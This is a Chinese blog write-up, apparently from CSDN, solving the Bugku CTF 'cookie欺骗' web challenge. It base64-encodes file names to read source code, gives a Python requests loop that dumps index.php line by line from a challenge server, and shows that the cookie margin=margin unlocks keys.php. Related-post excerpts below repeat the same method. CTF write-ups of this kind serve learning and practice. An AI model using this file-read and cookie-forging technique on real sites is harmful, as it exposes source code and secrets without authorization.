bugku-web-cookie欺骗

最新推荐文章于 2025-05-31 13:58:43 发布
原创 最新推荐文章于 2025-05-31 13:58:43 发布 · 984 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过将目标文件名转换为Base64编码并利用特定URL参数来绕过应用程序文件读取限制的方法。通过构造特定的URL请求并使用PHP脚本逐行读取文件,成功获取了敏感文件内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

url上有base64,解密得到filename=key.txt
index.php用base64加密
同样方法,把加密后的字符串,放到filename的参数中,回车
查看源代码,发现

<?php

猜测 url中
line参数可能控制了,每次读取的行数
简单测试一下 line=1
返回error_reporting(0);
写个脚本,自己手动慢慢一行一行出来也行

import requests
s=requests.session()
url='http://120.24.86.145:8002/web11/index.php'
for i in range(0,30):
    payload={'line':i,'filename':'aW5kZXgucGhw'}
    a=s.get(url,params=payload).content                
    a=a.decode('utf-8')
    print(a)

简单整理一下跑出来的代码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

很清楚了,这里构造keys.php的base64 作为filename的参数
再添加cookie,margin=margin 来读取keys.php的内容
用bp抓包
修改参数
这里写图片描述
得到flag

woy66
关注
Bugku——cookies欺骗
Dig_的博客
09-22 1212
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
BugkuCTF-WEBcookie欺骗
am_03的博客
08-29 1193
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
cookie欺骗bugku)
weixin_46396711的博客
04-28 1427
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
DVWA平台的Cookie欺骗攻击教程
最新发布
weixin_30798867的博客
05-31 629
随着互联网技术的迅猛发展,Web应用成为了企业与个人生活中不可或缺的一部分。然而,随着Web应用的普及,Web应用安全问题也日益凸显。网站遭到攻击,用户的个人信息泄露,这些情况已经屡见不鲜。因此,提升Web应用的安全防护,防范各种攻击手段,已经成为业界高度重视的问题。本章将从Web应用安全的基本概念入手,介绍常见的Web应用安全威胁,并深入探讨如何通过DVWA平台模拟攻击与防御。
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugku web cookies欺骗
weixin_43928140的博客
05-20 776
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
BugKucookies 欺骗
qq_39368007的博客
06-09 1503
查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30 import...
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 417
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
BugKuCTF中套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2448
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2214
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 359
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
bugku--cookie欺骗
YenKoc的博客
11-30 353
打开题目一看,是一串的东西,再看了一下filename发现不对劲了,明显是base64编码,拿去解码一下, 发现是这个,说明是filename,是需要解析的哪个文件名,把index.php编码一下,试试, 说明line需要去操作的,才可以把index.php给弄出来.直接上脚本 顺着代码意思,加入cookie就完事了。 ...
bugku——cookie欺骗
吃肉唐僧的博客
09-02 412
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
bugkucookies欺骗
Seaern的博客
08-02 676
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
COOKIE欺骗
蝈蝈俊.net
02-20 1511
作者:WormBuG转自: www.oso.com.cn现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通讯协议无影响,所以要进行cookie欺骗可以有多种
Bugkuctf web cookie欺骗
Amire0x的小乐园
05-07 734
题目链接 又有新东西啦 打开 发现没啥用,查看源码也没什么 注意到URL上有一串类似base64编码的东西 解码 习惯性访问一下 那下面又该咋办呢??? URL里filename有参数,line没有参数 要不试一试价格参数? line=1,啥都没有 注意到filename 的参数是base64编码后的 那再把1,2,3编码一波试试? 又回去了啥都没有。。。 懵逼中。。。 看了一下别人的write...
cookie欺骗
FreeXploiT
10-25 2148
现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9 和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通 讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1、跳过浏览器,直接对通讯数据改写 2、修改
cookie欺骗bugkuctf
02-26
Cookie欺骗是指攻击者通过各种手段获取用户的敏感Cookie信息,并利用这些信息冒充合法用户访问受保护的Web应用。当COOKIE的HTTPOnly flag没有设置时,对于很多只依赖于cookie验证的网站来说存在较大风险[^1]。 ####...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值